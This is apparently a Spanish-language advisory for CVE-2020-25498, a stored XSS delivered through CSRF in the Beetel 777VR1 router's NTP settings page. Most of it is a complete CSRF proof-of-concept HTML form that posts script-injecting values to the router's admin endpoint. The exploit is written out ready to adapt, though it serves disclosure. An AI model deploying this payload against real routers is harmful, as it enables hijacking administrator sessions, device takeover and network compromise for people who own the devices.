
XSS almacenado mediante CSRF en el router Beetel 777VR1
Se ha identificado que el endpoint vulnerable no tiene validación de entrada en el lado del servidor y carece de filtrado en el lado del cliente frente a cualquier inyección de script malicioso. Un atacante puede aprovechar esta vulnerabilidad para inyectar un script malicioso en el endpoint, y el script se activa cada vez que un usuario abre el endpoint vulnerable. El atacante puede enviar una URL maliciosa con un payload de petición POST para ejecutar XSS en el módulo de administración mediante CSRF, tomar el control del dispositivo y, finalmente, tomar el control de la red.
Investigadora: Sayli Ambure (https://twitter.com/sayli_ambure)
Enlace CVE de MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
Código HTML CSRF:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Parámetro: Nombre del servidor
Parámetro: Palabra clave